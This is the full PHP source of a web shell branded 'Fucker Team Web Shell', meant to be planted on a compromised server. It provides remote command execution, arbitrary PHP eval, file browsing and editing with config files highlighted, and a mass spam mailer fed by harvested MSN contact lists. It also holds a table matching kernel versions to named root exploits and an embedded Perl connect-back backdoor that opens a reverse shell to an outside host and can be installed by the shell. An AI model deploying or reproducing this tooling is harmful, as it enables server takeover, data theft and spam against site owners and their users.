<style>
body{
margin:20px 270px;
}
.header{
text-align:center;
font-size:22px;
}
*{
background-color:#242629;
font-family:Verdana,sans-serif;
color:white;
font-size:12px;
}
.on {
color:red;
}
.off {
color:orange;
}
a:link,a:visited{
text-decoration:none;
}
a:hover{
color:orange;
}
input,select
{
background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-size: 11px;
}
textarea{
background-color:#000000;
border:1px #e7e7eb dashed;
}
.down{
margin-top:15px;
}
ul,li{
padding:0px;
}
ul:hover{
margin-left:10px;
color:orange;
}
</style>
<?
/*#242629
###############################################################################
# Www.Fucker-Team.Com.AR #
# #
# Fucker Team Web Shell #
# contact: Knet.security@Gmail.com #
# #
# #
#Gr3tz to:f0urtruder,m0x.lk,syndr0me,Elec7rocbax,Remoteexecution.com.ar, #
# floop,n4ib4f,sant0,chame,argent0hack Team,Em3triX #
# c0ded by Knet.#
###############################################################################
*/
@set_time_limit(0);
if(@ini_get("safe_mode")==1){
$safe_mode='<font class="on">ON (Secure)</font>';
}
else
{
$safe_mode='<font class="off">OFF (No secure)</font>';
}
$OS=php_uname();
$Soft=$_SERVER[SERVER_SOFTWARE];
$shell=$_SERVER[SCRIPT_FILENAME];
$htdocs=$_SERVER[DOCUMENT_ROOT];
$info_s=$_SERVER[SERVER_NAME].' - '.$_SERVER[SERVER_ADDR];
$shelocation=$_SERVER[SERVER_NAME].$_SERVER[REQUEST_URI];
$prim=dirname($shell);
$remoteaddr=getenv('REMOTE_ADDR');
function chars(){
$VER = '<>@#€¬';
$VER=str_replace('<','F',$VER);
$VER=str_replace('>','u',$VER);
$VER=str_replace('@','c',$VER);
$VER=str_replace('#','k',$VER);
$VER=str_replace('€','e',$VER);
$VER=str_replace('¬','r',$VER);
$VAR = 'sh3l';
$VAR=str_replace('s','T',$VAR);
$VAR=str_replace('h','e',$VAR);
$VAR=str_replace('3','a',$VAR);
$VAR=str_replace('l','m',$VAR);
$title=$VER.' '.$VAR.' '."Shell";
echo '<title>'.getenv("HTTP_HOST").' - '.$title.'</title>';
}
function web(){
$VER = '<>@#€¬';
$VER=str_replace('<','F',$VER);
$VER=str_replace('>','u',$VER);
$VER=str_replace('@','c',$VER);
$VER=str_replace('#','k',$VER);
$VER=str_replace('€','e',$VER);
$VER=str_replace('¬','r',$VER);
$VAR = 'sh3l';
$VAR=str_replace('s','T',$VAR);
$VAR=str_replace('h','e',$VAR);
$VAR=str_replace('3','a',$VAR);
$VAR=str_replace('l','m',$VAR);
$head=$VER.' '.$VAR.' '.'Web'.' '."Shell";
echo '<h1 class="header">[+] '.$head.' [+]</h1>';
}
function msnlist($ctt){
$open=fopen($ctt,'r');
$ctt=fread($open,filesize($ctt));
$ctt=str_replace('<?xml version="1.0"?>','',$ctt);
$ctt=str_replace('<messenger>','',$ctt);
$ctt=str_replace('</messenger>','',$ctt);
$ctt=str_replace('<service name=".NET Messenger Service">','',$ctt);
$ctt=str_replace('</service>','',$ctt);
$ctt=str_replace('<contactlist>','',$ctt);
$ctt=str_replace('</contactlist>','',$ctt);
$ctt=str_replace('<contact type="1">','',$ctt);
$ctt=str_replace('<contact type="32">','',$ctt);
$ctt=str_replace('</contact>','',$ctt);
$ctt=str_replace(' ','',$ctt);
$ctt=str_replace(',',',',$ctt,$coma);
$ctt=trim($ctt);
if($coma<1){
$ctt=explode("\n",$ctt);
}
else{
$ctt=explode(',',$ctt);
}
$count=count($ctt);
$count++;
for($a=0;$count>$a;$a++){
if($ctt[$a]!=""){
@$spammeando=mail($ctt[$a],$asunt,$msj,'From: '.$from);
if($spammeando){
echo '<font class="off">'.trim($ctt[$a]).' spammed!'.'</font>'.'<br>';
}
else{
echo '<font class="on">'.trim($ctt[$a]).' Faild!'.'</font>'.'<br>';
}
}
else
{
}
}
}
?>
<?
chars();
web();
echo 'Safe mode: '.$safe_mode.'<br>';
echo 'OS: '.$OS.'<br>';
echo 'Server: '.$Soft.' - '.$info_s.'<br>';
echo 'htdocs: '."<a href=$PHP_SELF?path=$htdocs>";
echo $htdocs.'</a><br>';
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
$letters = "";
if ($win)
{
$v = explode("\\",$d);
$v = $v[0];
foreach (range("a","z") as $letter)
{
$bool = $isdiskette = in_array($letter,$safemode_diskettes);
if (!$bool) {$bool = is_dir($letter.":\\");}
if ($bool)
{
$letters .= "<a href=\"".$surl."$PHP_SELF?path=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "<font color=green>".$letter."</font>";}
$letters .= " ]</a> ";
}
}
if (!empty($letters)) {echo "Detected drives: ".$letters."<br>";}
}
echo ' <br><font class="on">[</font>'.'<a href="'.$_SERVER[PHP_SELF].'">'.'Shell'.'</a>'.'<font class="on">]</font>';
echo ' <font class="on">[</font>'.'<a href="?cmd">'.'Execution'.'</a>'.'<font class="on">]</font>';
echo ' <font class="on">[</font>'.'<a href="?script">'.'Evil Scripts'.'</a>'.'<font class="on">]</font>';
echo ' <font class="on">[</font>'.'<a href="?spam">'.'Spammer'.'</a>'.'<font class="on">]</font>';
echo ' <font class="on">[</font>'.'<a href="?eval">'.'PHP code'.'</a>'.'<font class="on">]</font>';
echo ' <font class="on">[</font>'.'<a href="?roots">'.'Rootexploits list'.'</a>'.'<font class="on">]</font>';
echo '<br>';
?>
<?
echo '<div class="down">';
if(isset($_GET['eval'])){
if(isset($_GET['eval']) && $_POST['phpcode']){
$phpcode=stripslashes($_POST['phpcode']);
echo '<textarea cols="100" rows="15" name="phpcode">';
@eval($phpcode);
echo '</textarea>'.
'<p>';
}
echo '<form method=POST action="?eval">'.
'<textarea cols="100" rows="16" name="phpcode">';
if($_POST['phpcode']!=""){
echo stripslashes($_POST['phpcode']);
}
else{
echo '/* example =D */'."\n"."\n";
echo 'print_r($_SERVER);'."\n";
echo 'echo "\n";'."\n";
echo 'echo "eval phpcode by FT Web shell";';
}
echo '</textarea>'.
'<br>'.
'<input type=Submit name=e_eval value="execute!">'.
'</form>';
exit();
}
?>
<?
echo '<div class="down">';
if(isset($_GET['roots'])){
echo '<textarea cols="100" rows="30" READONLY>';
?>
2.4.17
newlocal
kmod
2.4.18
brk
brk2
newlocal
kmod
km.2
2.4.19
brk
brk2
newlocal
kmod
km.2
2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2
2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod
2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod
2.4.22-10
loginx
./loginx
2.4.23
mremap_pte
2.4.24
mremap_pte
Uselib24
2.4.25-1
uselib24
2.4.27
Uselib24
2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit
2.6.2
mremap_pte
krad
h00lyshit
2.6.5 to 2.6.10
krad
krad2
h00lyshit
2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit
2.6.9-34
r00t
h00lyshit
2.6.13-17
prctl
h00lyshit
-------------------
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
<?
exit();
}
?>
<?
if(isset($_GET['cmd'])){
echo '<div class="down">';
echo '<form method=POST action="?cmd">
<input type=TEXT name=sys value="'.$_POST['sys'].'" size="50">
<input type=submit name=EX value="Execute">';
echo '</form>';
if($_POST['sys']!="" && isset($_POST['EX'])){
echo '<textarea cols="100" rows="30">';
system($_POST['sys']);
echo '</textarea>';
echo '</div>';
exit();
}
exit();
}
?>
<?
if(isset($_GET['spam'])){
echo '<div class="down">';
if(isset($_GET['spam']) && isset($_POST['more_spamm']) && $_FILES['file']!=""){
$name=$_FILES['file']['name'];
$security=explode('.',$name);
$security=array_reverse($security);
if($security[0]!='ctt' AND $security[0]!='txt'){
echo '<code>solo se admiten archivos .ctt & .txt</code>';
}
else{
$tmp=$_FILES['file']['tmp_name'];
msnlist($tmp);
}
exit();
}
echo '<form method=POST action="?spam" enctype="multipart/form-data">';
echo '<table>'.
'<tr><td>'.
'Asunto :'.
'</td>'.
'<td>'.
'<input type=TEXT name=asunt>'.
'</td></tr>'.
'<tr><td>'.
'From :'.
'</td>'.
'<td>'.
'<input type=TEXT name=from>'.
'</td></tr>'.
'<tr><td>'.
'Spam here!:'.
'</td></tr>'.
'</table>'.
'<table>'.
'<tr><td>'.
'<textarea rows=15 cols=70 name=msj>'.
'</textarea>'.
'</td></tr>'.
'</table>';
echo 'import Mail list .txt or .ctt :'.
'<br>'.
'<input type=FILE name=file size=60><br>'.
'<div class="down">'.
'<input type=Submit name=more_spamm value="Spam!">'.
'</form>';
exit();
}
?>
<?
if(isset($_GET['script'])){
echo '<div class="down">';
if(isset($_GET['script']) && isset($_POST['s_cript']) && $_POST['e_vil']!=""){
@$write=fopen($_POST['e_vil'],'w+');
$code=stripslashes($_POST['evil_s']);
@$ok=fwrite($write,$code);
if(!$ok){
echo '<br>=/ Fucking Perms';
}
else{
echo '<br>=D installed!';
}
exit();
}
if(isset($_GET['script']) && isset($_GET['evil']) && $_GET['evil']=="1"){
echo 'install:'.'</td><td>'.
'<form method=POST action="?script&install">'.
'<input type=TEXT name=e_vil size=100 value="'.$prim.'/dc.pl'.'">'.
'<input type=Submit name=s_cript value="Install!">';
echo '<textarea cols="100" rows="30" name="evil_s">';
?>
#!/usr/bin/perl
use Socket;
print "Data Chaos Connect Back Backdoor\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[+] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[+] Connecting...\n";
$proto = getprotobyname('tcp') or die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[+]Spawning Sh3ll\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[+]Datached\n";
<?
echo '</textarea>';
echo '<br>';
echo '<a href="?script">'.'Volver'.'</a>';
echo '</form>';
exit();
}
echo '<li>'.'Backd00rs'.'</li>';
echo '<ul>'.'<a href="?script&evil=1">'.'Data Cha0s - dc.pl'.'</a>'.'</ul>';
exit();
}
?><?
if(isset($_POST['go_dir']) && $_POST['n_path']!=""){
$_GET['path']=$_POST['n_path'];
}
?><?
if(isset($_POST['mkfile'])){
if(isset($_POST['mkfile']) && $_POST['r_file']!="" && isset($_POST['mk_code'])){
if($_POST['r_file']!=dirname($_POST['r_file'])){
@$write=fopen($_POST['r_file'],'w+');
@$mk_code=stripslashes($_POST['mk_code']);
@$ok=fwrite($write,$mk_code."\n");
if(!$ok){
echo '<br>=/ Fucking Perms';
}
else{
echo '<br>=D save!';
}
exit();
}
}
echo '<div class="down">';
echo '<form action="" method=POST>';
echo '<input type=TEXT name=r_file size=100 value="'.$_POST['r_file'].'">';
echo '<br>';
echo '<input type=Submit name=mkfile value="Make!">';
echo '<br>';
echo '<textarea cols="100" rows="30" name="mk_code">';
echo '</textarea>';
echo '</form>';
exit();
}
?><?
if(isset($_POST['mkdir']) && $_POST['r_dir']!=""){
@$ok=mkdir($_POST['r_dir']);
if(!$ok){
echo '<br>=/ Fucking Perms';
}
else{
echo '<br>=D save!';
}
exit();
}
?><?
if(isset($_GET['R']) && isset($_GET['P'])){
echo '<div class="down">';
if(isset($_POST['rename']) AND $_POST['name']!=""){
@$new=rename($_GET['R'].'/'.$_GET['P'],$_GET['R'].'/'.$_POST['name']);
if(!$new){
echo '=/ Fucking Perms';
}
else{
echo '=D Save!';
exit();
}
}
echo '<form action="" method=POST>
<input type=text name="name" value="'.$_GET['P'].'" size="50">
<br><input type=Submit name="rename" value="Rename!"><br>';
echo '</form>';
exit();
}
?><?
if(isset($_GET['E'])){
echo '<div class="down">';
$e_on=explode('/',$_GET['E']);
$e_on=array_reverse($e_on);
echo 'File to Edit: '.$e_on[0].'<p>';
echo '<form action="" method=POST>
<input type=Submit name="editor" value="Save!">';
if(isset($_POST['editor'])){
@$write=fopen($_GET['E'],'w+');
$code=stripslashes($_POST['code']);
@$ok=fwrite($write,$code);
if(!$ok){
echo '<br>=/ Fucking Perms';
}
else{
echo '<br>=D save!';
}
}
echo '<br>';
echo '<textarea cols="100" rows="30" name="code">';
@$read=fopen($_GET['E'],'r');
@$read=fread($read,filesize($_GET['E']));
echo htmlentities($read);
echo '</textarea>';
echo '</form>';
echo '</div>';
exit();
}
?><?
if(isset($_GET['V'])){
echo '<div class="down">';
$v_on=explode('/',$_GET['V']);
$v_on=array_reverse($v_on);
echo 'file: '.$v_on[0].'<p>';
echo '<textarea cols="100" rows="30" READONLY>';
@$read=fopen($_GET['V'],'r');
@$read=fread($read,filesize($_GET['V']));
echo htmlentities($read);
echo '</textarea>';
echo '</div>';
exit();
}
?><?
if(isset($_GET['Rm'])){
echo '<div class="down">';
@$rmd=rmdir($_GET['Rm']);
if(!$rmd){
echo "=/ Fucking perms";
exit();
}
else{
echo "=D deleted";
exit();
}
echo '</div>';
}
?><?
if(isset($_GET['D'])){
echo '<div class="down">';
@$unlk=unlink($_GET['D']);
if(!$unlk){
echo "=/ Fucking perms";
exit();
}
else{
echo "=D deleted";
exit();
}
echo '</div>';
}
?><?
echo '<div class="down">';
echo '<table>';
if($_GET['path']==""){
@$directorio=dir($prim);
$ruta=$prim;
}
else{
@$directorio=dir($_GET['path']);
$ruta=$_GET['path'];
}
while ($archivo = $directorio->read())
{
$type=filetype($ruta.'/'.$archivo);
if($type=="dir"){
$perms = fileperms($ruta.'/'.$archivo);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
if($archivo!='.'){
echo '<tr>'.'<td>'.'<a href="?path='.$ruta.'/'.$archivo.'">'.'<font class="on">/</font>'.$archivo.'</a>'.'</td>';
if(is_writable($ruta.'/'.$archivo)){echo '<td WIDTH=200>'.'<font class="off">'.$info.'</font>'.'</td>';}
else{echo '<td WIDTH=200>'.'<font class="on">'.$info.'</font>'.'</td>';}
}
if($archivo!='.' && $archivo!='..'){
echo '<td>'.'<a href="?R='.$ruta.'&P='.$archivo.'">'.'[Rename]'.'</a>'.'</td>';
echo '<td>'.'<a href="?Rm='.$ruta.'/'.$archivo.'">'.'[Delete]'.'</a>'.'</td>';
echo '</tr>';
}
}
else{
$perms = fileperms($ruta.'/'.$archivo);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
$type=explode('.',$archivo);
if($archivo=="config.php" || $archivo=="wp-config.php" || $archivo=="conf.php" || $archivo=="configuration.php"
|| $archivo=="admin.php" || $archivo=="index.php" || $archivo=="index.html" || $archivo=="index.htm"){
echo '<tr>'.'<td WIDTH=200>'.'<b>'.'<a href="?V='.$ruta.'/'.$archivo.'">'.$archivo.'</a>'.'</b>'.'</td>';}
else{
echo '<tr>'.'<td WIDTH=200>'.'<a href="?V='.$ruta.'/'.$archivo.'">'.$archivo.'</a>'.'</td>';
}
if(is_writable($ruta.'/'.$archivo)){echo '<td WIDTH=200>'.'<font class="off">'.$info.'</font>'.'</td>';}
else{echo '<td WIDTH=200>'.'<font class="on">'.$info.'</font>'.'</td>';}
echo '<td>'.'<a href="?V='.$ruta.'/'.$archivo.'">'.'[View]'.'</a>'.'</td>';
echo '<td>'.'<a href="?E='.$ruta.'/'.$archivo.'">'.'[Edit]'.'</a>'.'</td>';
echo '<td>'.'<a href="?R='.$ruta.'&P='.$archivo.'">'.'[Rename]'.'</a>'.'</td>';
echo '<td>'.'<a href="?D='.$ruta.'/'.$archivo.'">'.'[Delete]'.'</a>'.'</td>';
echo '</tr>';
}
}
$directorio->close();
echo '</table>';
?>
<?
echo '<div class="down">';
echo '<table>';
echo '<tr><td>'.
'Make File:'.'</td><td>'.'<form method=POST action="">'.
'<input type=TEXT name=r_file size=100 value="'.$ruta.'/'.'">'.
'<input type=Submit name=mkfile value="Make!">'.
'</td></tr>'.
'</form>'.
'<form method=POST action="">'.
'<tr><td>'.
'Make Dir:'.'</td><td>'.
'<input type=TEXT name=r_dir size=100 value="'.$ruta.'/'.'">'.
'<input type=Submit name=mkdir value="Make!">'.
'</td></tr>'.
'</form>'.
'<tr><td>'.
'<form method=POST action="">'.
'Goto dir:'.'</td><td>'.
'<input type=TEXT name=n_path size=100 value="'.$prim.'/'.'">'.
'<input type=Submit name=go_dir value="Go!">'.
'</form>';
echo '</table>';
?>